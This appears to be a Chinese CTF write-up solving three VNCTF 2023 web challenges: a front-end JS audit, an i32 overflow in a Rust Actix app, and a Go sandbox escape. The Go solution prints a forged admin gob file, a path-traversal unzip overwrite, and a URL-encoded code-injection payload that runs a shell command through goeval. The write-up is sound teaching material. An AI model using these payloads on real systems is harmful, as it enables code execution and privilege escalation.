文章目录
- 象棋王子
- 电子木鱼
- BabyGo
象棋王子
考点:前端js代码审计
直接查看js源码,搜一下alert
丢到控制台即可
电子木鱼
考点:整数溢出
main.rs我们分段分析
首先这段代码是一个基于Rust的web应用程序中的路由处理函数。它使用了Rust的异步框架Actix和模板引擎Tera。
然后就是定义了不同结构体并且自动生成了序列化
#[derive(Serialize)]
struct APIResult {success: bool,message: &'static str,
}#[derive(Deserialize)]
struct Info {name: String,quantity: i32,
}#[derive(Debug, Copy, Clone, Serialize)]
struct Payload {name: &'static str,cost: i32,
}
给了payload列表
const PAYLOADS: &[Payload] = &[Payload {name: "Cost",cost: 10,},Payload {name: "Loan",cost: -1_000,},Payload {name: "CCCCCost",cost: 500,},Payload {name: "Donate",cost: 1,},Payload {name: "Sleep",cost: 0,},
];
然后看向/路由
#[get("/")]
async fn index(tera: web::Data<Tera>) -> Result<HttpResponse, Error> {let mut context = Context::new();context.insert("gongde", &GONGDE.get());if GONGDE.get() > 1_000_000_000 {context.insert("flag",&std::env::var("FLAG").unwrap_or_else(|_| "flag{test_flag}".to_string()),);}match tera.render("index.html", &context) {Ok(body) => Ok(HttpResponse::Ok().body(body)),Err(err) => Err(error::ErrorInternalServerError(err)),}
}
在函数内部,首先创建了一个Context对象。然后通过context.insert("gongde",&GONGDE.get())将名为"gongde"的变量插入到上下文中,其值使用了一个全局变量GONGDE的get()方法来获取。接下来,通过判断GONGDE.get()的值是否大于1,000,000,000,如果是则返回flag
最后分析/upgrade路由
#[post("/upgrade")]
async fn upgrade(body: web::Form<Info>) -> Json<APIResult> {if GONGDE.get() < 0 {return web::Json(APIResult {success: false,message: "功德都搞成负数了,佛祖对你很失望",});}if body.quantity <= 0 {return web::Json(APIResult {success: false,message: "佛祖面前都敢作弊,真不怕遭报应啊",});}if let Some(payload) = PAYLOADS.iter().find(|u| u.name == body.name) {let mut cost = payload.cost;if payload.name == "Donate" || payload.name == "Cost" {cost *= body.quantity;}if GONGDE.get() < cost as i32 {return web::Json(APIResult {success: false,message: "功德不足",});}if cost != 0 {GONGDE.set(GONGDE.get() - cost as i32);}if payload.name == "Cost" {return web::Json(APIResult {success: true,message: "小扣一手功德",});} else if payload.name == "CCCCCost" {return web::Json(APIResult {success: true,message: "功德都快扣没了,怎么睡得着的",});} else if payload.name == "Loan" {return web::Json(APIResult {success: true,message: "我向佛祖许愿,佛祖借我功德,快说谢谢佛祖",});} else if payload.name == "Donate" {return web::Json(APIResult {success: true,message: "好人有好报",});} else if payload.name == "Sleep" {return web::Json(APIResult {success: true,message: "这是什么?床,睡一下",});}}web::Json(APIResult {success: false,message: "禁止开摆",})
}
POST接收info结构体的参数进行解析,然后返回json格式的APIResult类型的值;然后判断GONGDE.get() 的值是否小于0,POST请求参数quantity值是否小于等于0,如果name的值等于Donate或者Cost,进行自乘;如果大于i32则会造成整数溢出
i32 是 Rust 编程语言中的一种整数类型。它代表有符号的 32 位整数,可以存储的整数范围为 -2,147,483,648 到 2,147,483,647。
name=Loan&quantity=11451411
发现成功加了1000功德
然后修改name为Cost
得到flag
BabyGo
考点:文件覆盖、go沙箱逃逸
源码如下
package mainimport ("encoding/gob""fmt""github.com/PaulXu-cn/goeval""github.com/duke-git/lancet/cryptor""github.com/duke-git/lancet/fileutil""github.com/duke-git/lancet/random""github.com/gin-contrib/sessions""github.com/gin-contrib/sessions/cookie""github.com/gin-gonic/gin""net/http""os""path/filepath""strings"
)type User struct {Name stringPath stringPower string
}func main() {r := gin.Default()store := cookie.NewStore(random.RandBytes(16))r.Use(sessions.Sessions("session", store))r.LoadHTMLGlob("template/*")r.GET("/", func(c *gin.Context) {userDir := "/tmp/" + cryptor.Md5String(c.ClientIP()+"VNCTF2023GoGoGo~") + "/"session := sessions.Default(c)session.Set("shallow", userDir)session.Save()fileutil.CreateDir(userDir)gobFile, _ := os.Create(userDir + "user.gob")user := User{Name: "ctfer", Path: userDir, Power: "low"}encoder := gob.NewEncoder(gobFile)encoder.Encode(user)if fileutil.IsExist(userDir) && fileutil.IsExist(userDir+"user.gob") {c.HTML(200, "index.html", gin.H{"message": "Your path: " + userDir})return}c.HTML(500, "index.html", gin.H{"message": "failed to make user dir"})})r.GET("/upload", func(c *gin.Context) {c.HTML(200, "upload.html", gin.H{"message": "upload me!"})})r.POST("/upload", func(c *gin.Context) {session := sessions.Default(c)if session.Get("shallow") == nil {c.Redirect(http.StatusFound, "/")}userUploadDir := session.Get("shallow").(string) + "uploads/"fileutil.CreateDir(userUploadDir)file, err := c.FormFile("file")if err != nil {c.HTML(500, "upload.html", gin.H{"message": "no file upload"})return}ext := file.Filename[strings.LastIndex(file.Filename, "."):]if ext == ".gob" || ext == ".go" {c.HTML(500, "upload.html", gin.H{"message": "Hacker!"})return}filename := userUploadDir + file.Filenameif fileutil.IsExist(filename) {fileutil.RemoveFile(filename)}err = c.SaveUploadedFile(file, filename)if err != nil {c.HTML(500, "upload.html", gin.H{"message": "failed to save file"})return}c.HTML(200, "upload.html", gin.H{"message": "file saved to " + filename})})r.GET("/unzip", func(c *gin.Context) {session := sessions.Default(c)if session.Get("shallow") == nil {c.Redirect(http.StatusFound, "/")}userUploadDir := session.Get("shallow").(string) + "uploads/"files, _ := fileutil.ListFileNames(userUploadDir)destPath := filepath.Clean(userUploadDir + c.Query("path"))for _, file := range files {if fileutil.MiMeType(userUploadDir+file) == "application/zip" {err := fileutil.UnZip(userUploadDir+file, destPath)if err != nil {c.HTML(200, "zip.html", gin.H{"message": "failed to unzip file"})return}fileutil.RemoveFile(userUploadDir + file)}}c.HTML(200, "zip.html", gin.H{"message": "success unzip"})})r.GET("/backdoor", func(c *gin.Context) {session := sessions.Default(c)if session.Get("shallow") == nil {c.Redirect(http.StatusFound, "/")}userDir := session.Get("shallow").(string)if fileutil.IsExist(userDir + "user.gob") {file, _ := os.Open(userDir + "user.gob")decoder := gob.NewDecoder(file)var ctfer Userdecoder.Decode(&ctfer)if ctfer.Power == "admin" {eval, err := goeval.Eval("", "fmt.Println(\"Good\")", c.DefaultQuery("pkg", "fmt"))if err != nil {fmt.Println(err)}c.HTML(200, "backdoor.html", gin.H{"message": string(eval)})return} else {c.HTML(200, "backdoor.html", gin.H{"message": "low power"})return}} else {c.HTML(500, "backdoor.html", gin.H{"message": "no such user gob"})return}})r.Run(":80")
}
分析一下
/路由下定义了userDir为/tmp/xxx/,然后将该值赋值给session的键名shallow,接着创建目录读取user.gob并且创建user对象,具有三个属性。最后创建了一个新的Gob编码器encoder,并使用encoder.Encode方法将user对象编码并写入gobFile文件。通过调用Encode方法,user对象的值将被序列化并写入文件中/upload路由就是简单的文件上传功能,限制了上传文件类型不能为go和gob/unzip路由定义userUploadDir为session的shallow值拼接上uploads/,然后destPath由userUploadDir拼接上GET请求中可控参数名path。也就是说我们可以任意路径文件解压/backdoor路由读取user.gob文件内容,判断是否为admin,如果是则返回good
整体思路:我们利用任意路径文件解压和文件覆盖来实现覆盖user.gob,使得身份为admin;然后利用/backdoor的eval实现命令执行
我们已经知道user.gob的生成方式
那么我们创建user.go,内容如下
package mainimport ("encoding/gob""os"
)type User struct {Name stringPath stringPower string
}func main() {gobFile, _ := os.Create("user.gob")user := User{Name: "ctfer", Path: "/tmp/4f0436fe5585d82af7c4545984d58188/", Power: "admin"}encoder := gob.NewEncoder(gobFile)encoder.Encode(user)
}
go run一下,得到user.gob
然后丢到linux里压缩成zip
上传文件后,访问/unzip去解压到对应路径
然后我们访问一下/backdoor,成功覆盖
接下来就是如何命令执行 参考文章
这里考点是go语言沙箱逃逸
payload
/backdoor?pkg=os/exec"%0A"fmt")%0Afunc%09init()%7B%0Acmd:=exec.Command("/bin/sh","-c","cat${IFS}/f*")%0Ares,err:=cmd.CombinedOutput()%0Afmt.Println(err)%0Afmt.Println(res)%0A}%0Aconst(%0AMessage="fmt
python脚本解一下得到flag
str = [102,108,97,103,123,102,54,52,99,98,52,56,53,45,101,98,57,53,45,52,52,50,99,45,57,99,49,54,45,55,100,102,98,48,52,97,100,102,57,57,101,125,10]for i in range(42):print(chr(str[i]),end="")
![nginx: [alert] could not open error log file](https://img-blog.csdnimg.cn/direct/28037170e1c744df935d45da7e6cf7d3.png#pic_center)
